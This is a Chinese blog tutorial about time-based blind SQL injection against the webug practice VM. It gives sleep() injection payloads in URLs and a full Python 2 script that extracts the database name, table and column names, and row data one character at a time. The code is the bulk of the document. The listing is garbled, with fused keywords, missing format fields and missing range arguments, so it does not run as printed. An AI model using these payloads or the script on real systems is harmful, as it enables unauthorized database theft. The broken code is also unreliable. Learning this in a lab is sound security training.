用Python自定义打造的时间盲注脚本

推荐一个自带很多 web 练习的入门虚拟机——webug,网上有资源;如果嫌太大,可以找 Johnson 要。

最近johnson在测试webug上的一个时间盲注的时候,就想着自己写一个脚本。

访问页面是这样的:

提示说需要传入一个 type 参数。

参数变了,页面也会跟着变化。既然是时间注入,就自己手动测试一下。

Payload1:

192.168.1.107/pentest/test/time/?type=1 and if(substr(database(),1,1)='a',sleep(3),1)

页面直接刷新了,没有出现延时;经过不断地尝试,发现当 payload 为:

192.168.1.107/pentest/test/time/?type=1 and if(substr(database(),1,1)='p',sleep(3),1) 的时候,页面会暂停 3 秒,所以数据库名的第一个字母是 p。为了锻炼自己,手动写了一个简单但冗余非常大的脚本。

#!/usr/bin/env python

# encoding: utf-8

"""

@version: V1.0

@author: johnson

@file: bool_time.py

@time: 1/2/18 4:24 PM

"""

importrequests

importtime

# Delay, in seconds, that the injected sleep() is asked to hold for.  Every
# timing check below treats a round trip slower than s-1 seconds as a hit, so
# this value is also the detection threshold: on a slow or jittery link an
# ordinary response can cross it and be misread as a match.
s =3# number of seconds to delay

# Main routine
#
# Interactive driver.  Reads the URL under test from stdin, then walks the
# blind-extraction ladder: database-name length -> name, table count ->
# name lengths -> names, and, on request, column names and row data for one
# table.  Each step issues one HTTP request per candidate value and keeps
# whichever one takes longer than s-1 seconds, so a run is a long burst of
# near-identical requests to a single endpoint that differ only in the
# injected condition, with latency clustering at ~s seconds on hits -- the
# traffic shape a WAF, a rate limit or a slow-query log review would surface.
# Python 2 listing: raw_input and print statements throughout.
# NOTE(review): inter-token whitespace was lost when this listing was
# extracted ("defmain", "whilebreak_while", ...); it does not parse as shown.

defmain():

url =raw_input("Please input url:")# URL under test, used as typed

# # url = "http://192.168.1.105/pentest/test/time/?type=1"

# Candidate alphabet tried, in this order, for every character position.
payloads ="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789@_.}{,"

print"start get length..."

length = getDatabaseLength(url)# length of the current database name

print"start database sql injection..."

database = getDatabaseName(url,length,payloads)# name of the current database

print"the current database is "+ database

print"start get table count..."

table_count = getTableCount(url,database)# number of tables in that schema

print"the database %s's table count is %d"% (database,table_count)

print"start get table length..."

# table_count = 4

table_length = (getTableLength(url,table_count,database))# one name length per table

printtable_length

print"start table sql injection..."

tables = getTableName(url,payloads,database,table_length)# table names

print"table name is "

printName(tables)

break_while ='Y'

# Loop: dump the column names of each table the user asks about.
# raw_input never returns None, so the "is None" reset below is dead code; an
# empty answer matches neither branch and simply ends the loop.

whilebreak_while =='Y'orbreak_while =='y':

table_name =raw_input("Please input table name:")

columns = getColumnName(url,table_name,database,payloads)# column names of the chosen table

print"column name is "

printName(columns)

break_while =raw_input("Do you want to inject other table name?(Y/n)")

ifbreak_whileisNone:

break_while ='Y'

ifbreak_while =='n'orbreak_while =='N':

get_data =raw_input("Do you want to test other column?(Y/n)")

ifget_data =='Y'orget_data =='y':

column_name =raw_input("Please input column name:")

getDatas(url,payloads,table_name,column_name)# rows of one column; return value is not used

break

else:

break_while ='N'

# Length of the current database name
#
# Tries lengths 1..49, one request each, and returns the first whose round
# trip exceeds s-1 seconds.  The check is a single comparison with no
# confirming request.  Falls off the loop and returns None if nothing matches.
# NOTE(review): .format() is given url/i/s but the template contains no
# "{...}" fields -- the braces were most likely lost in extraction, so the
# string as printed is not a URL at all.

defgetDatabaseLength(url):

foriinrange(1,50):

start_time = time.time()

url1 =" and if(length(database())=, sleep(),1)%23".format(url=url,i=i,s=s)

#print url1

requests.get(url1)# response body is ignored; only elapsed time is used

iftime.time() - start_time > s-1:

print"the length is "+str(i)

returni

# Name of the current database
#
# For each position 1..length, tries every character of payloads and appends
# the first one whose request exceeds s-1 seconds, printing the partial name.
# A position with no hit is silently skipped, so the result can be shorter
# than length.
# NOTE(review): the template has lost its "{...}" fields in extraction.

defgetDatabaseName(url,length,payloads):

database =""

fordinrange(1,length +1):

forpayloadinpayloads:

start_time = time.time()

url2 =" and if(substr(database(), ,1)='', sleep(),1)%23".format(url=url,d=d,payload=payload,s=s)

requests.get(url2)

iftime.time() - start_time > s-1:

database += payload

printdatabase

break

returndatabase

# Number of tables in the given database
#
# Tries counts 1..49 and returns the first whose request exceeds s-1 seconds;
# otherwise returns the initial value.
# NOTE(review): "table_count =" has no right-hand side in this listing (the
# initial value was lost), and the template has lost its "{...}" fields.

defgetTableCount(url,database):

table_count =

forcountinrange(1,50):

start_time_of_table_count = time.time()

url_get_count =" and if(substr((select count(*) from information_schema.tables where table_schema=''),1,1) = , sleep(),1)%23".format(url= url,database= database,s= s,count= count)

requests.get(url_get_count)

#print urlGetCount

iftime.time() - start_time_of_table_count > s-1:

table_count = count

break

returntable_count

# Name length of every table in the given database
#
# For each table offset count, tries lengths 1..20 and appends the first that
# exceeds s-1 seconds, printing it with a 1-based table number.  A table with
# no hit gets no entry, so the list can be shorter than table_count and the
# caller, which indexes it by position, then reads the wrong table.
# NOTE(review): range(,table_count) has lost its first argument, and the
# template has lost its "{...}" fields.

defgetTableLength(url,table_count,database):

table_length = []

forcountinrange(,table_count):

foriinrange(1,21):

start_time_of_table_length = time.time()

url3 =" and if(substr((select length(table_name) from information_schema.tables where table_schema='' limit ,1),1,1) = , sleep(),1)%23".format(url= url,database= database,count= count,i= i,s= s)

#print url3

requests.get(url3)

iftime.time() - start_time_of_table_length > s-1:

table_length.append(i)

print"the table '%d' length is %s"% (count+1,i)

break

returntable_length

# Table names
#
# For each entry of table_length (its index i doubles as the table offset),
# recovers the name character by character exactly as getDatabaseName does,
# printing the partial name after each hit.  Positions with no hit are
# skipped.  Unlike the other templates this one has no trailing "%23".
# NOTE(review): range(,len(table_length)) has lost its first argument, and
# the template has lost its "{...}" fields.

defgetTableName(url,payloads,database,table_length):

tables = []

foriinrange(,len(table_length)):

table =""

fordinrange(1,table_length[i]+1):

forpayloadinpayloads:

start_time_of_table_name = time.time()

url4 =" and if(substr((select table_name from information_schema.tables where table_schema='' limit ,1),'',1) = '', sleep(),1)".format(url= url,i= i,d= d,payload= payload,database= database,s= s)

requests.get(url4)

iftime.time() - start_time_of_table_name > s-1:

table += payload

printtable

break

tables.append(table)

returntables

# Print each element of result on its own line
# NOTE(review): range(,len(result)) has lost its first argument in this
# listing.

defprintName(result):

foriinrange(,len(result)):

printresult[i]

# Number of columns in the given table
#
# Same shape as getTableCount: counts 1..49, first request slower than s-1
# seconds wins, otherwise the initial value is returned.
# NOTE(review): "column_count =" has no right-hand side in this listing, and
# the template has lost its "{...}" fields.

defgetColumnCount(url,table_name,database):

column_count =

forcountinrange(1,50):

start_time_of_column_count = time.time()

url_get_column_count =" and if(substr((select count(*) from information_schema.columns where table_schema='' and table_name=''),1,1) = , sleep(),1)%23".format(url= url,database= database,s= s,table_name=table_name,count= count)

requests.get(url_get_column_count)

# print urlGetColumnCount

iftime.time() - start_time_of_column_count > s-1:

column_count = count

break

returncolumn_count

# Name length of every column in the given table
#
# Same shape as getTableLength: for each column offset, lengths 1..20 are
# tried and the first hit appended; columns with no hit get no entry.
# NOTE(review): range(,column_count) has lost its first argument, and the
# template has lost its "{...}" fields.

defgetColumnLen(url,column_count,database,table_name):

column_length = []

forcountinrange(,column_count):

foriinrange(1,21):

start_time = time.time()

get_url=" and if(substr((select length(column_name) from information_schema.columns where table_schema='' and table_name='' limit ,1),1,1) = , sleep(),1)%23".format(url= url,database= database,table_name=table_name,count= count,i= i,s= s)

#print getURL

requests.get(get_url)

iftime.time() - start_time > s-1:

column_length.append(i)

print"the column '%d' length is %s"% (count+1,i)

break

returncolumn_length

# Column names of the given table
#
# Obtains the column count and name lengths itself, then recovers each name
# character by character as getTableName does; k is both the list index and
# the column offset passed to the template as i.
# NOTE(review): range(,len(column_len)) has lost its first argument, and the
# template has lost its "{...}" fields.

defgetColumnName(url,table_name,database,payloads):

column_names = []

column_count = getColumnCount(url,table_name,database)

printcolumn_count

column_len = getColumnLen(url,column_count,database,table_name)

forkinrange(,len(column_len)):

column =""

fordinrange(1,column_len[k]+1):

forpayloadinpayloads:

start_time = time.time()

url4 =" and if(substr((select column_name from information_schema.columns where table_schema='' and table_name='' limit ,1),'',1) = '', sleep(),1)%23".format(

url=url,database=database,table_name=table_name,i=k,d=d,payload=payload,s=s)

requests.get(url4)

iftime.time() - start_time > s -1:

column += payload

printcolumn

break

column_names.append(column)

returncolumn_names

# Number of rows in the given table
#
# Same shape as getTableCount: counts 1..49, first request slower than s-1
# seconds wins, otherwise the initial value is returned.
# NOTE(review): "data_count =" has no right-hand side in this listing, and the
# template has lost its "{...}" fields.

defgetDataCount(url,table_name,column_name):

data_count =

forcountinrange(1,50):

start_time = time.time()

url_get_data_count =" and if(substr((select count(*) from ),1,1) = , sleep(),1)%23".format(

url=url,column_name=column_name,s=s,table_name=table_name,count=count)

requests.get(url_get_data_count)

# print urlGetColumnCount

iftime.time() - start_time > s -1:

data_count = count

break

returndata_count

# Length of the value in row id of the given column
#
# Tries candidate lengths up to 100000 -- far beyond the 50/21 caps used by
# the other probes, so a row with no hit costs up to 100000 requests.  The
# parameter named id shadows the builtin of the same name.
# NOTE(review): "data_len =" has no right-hand side, range(,100000) has lost
# its first argument, and the template has lost its "{...}" fields.

defgetDataLen(url,table_name,column_name,id):

data_len =

forlinrange(,100000):

start_time_of_get_data_len = time.time()

get_data_len_url =" and if(substr((select length() from limit ,1)=,1,1), sleep(),1)%23".format(s= s,l= l,id= id,table_name= table_name,column_name= column_name,url= url)

requests.get(get_data_len_url)

# print get_data_len_url

iftime.time() - start_time_of_get_data_len > s -1:

print"the data '%d' length is %d"% (id,l)

data_len = l

break

returndata_len

# Values of one column, row by row
#
# For each row offset i, fetches the value length and then recovers the value
# character by character, printing the partial value after each hit.  Results
# are collected in datas but the function has no return statement, so the
# caller only ever sees the printed output.  The position loop here runs to
# data_len inclusive from the (missing) first argument, unlike the
# range(1, len+1) used by the name probes.
# NOTE(review): both range(...) calls have lost their first argument, and the
# template has lost its "{...}" fields.

defgetDatas(url,payloads,table_name,column_name):

datas = []

data_count = getDataCount(url,table_name,column_name)

print"the data's count is %d"% (data_count)

foriinrange(,data_count):

data =""

data_len = getDataLen(url,table_name,column_name,i)

print"the data's len is %d"% (data_len)

forjinrange(,data_len +1):

forpayloadinpayloads:

start_time = time.time()

url_of_get_datas =" and if(substr((select from limit ,1),,1)='', sleep(),1)%23".format(url=url,column_name=column_name,table_name=table_name,payload=payload,j=j,s=s,i=i)

requests.get(url_of_get_datas)

iftime.time() - start_time > s -1:

data += payload

printdata

break

datas.append(data)

# Script entry point; guarded so the helpers can be imported without running.
if__name__ =='__main__':

main()

最后的结果就是:

代码写得比较随意,只是希望多交流学习。

本文来自企鹅号 - 计科信安媒体
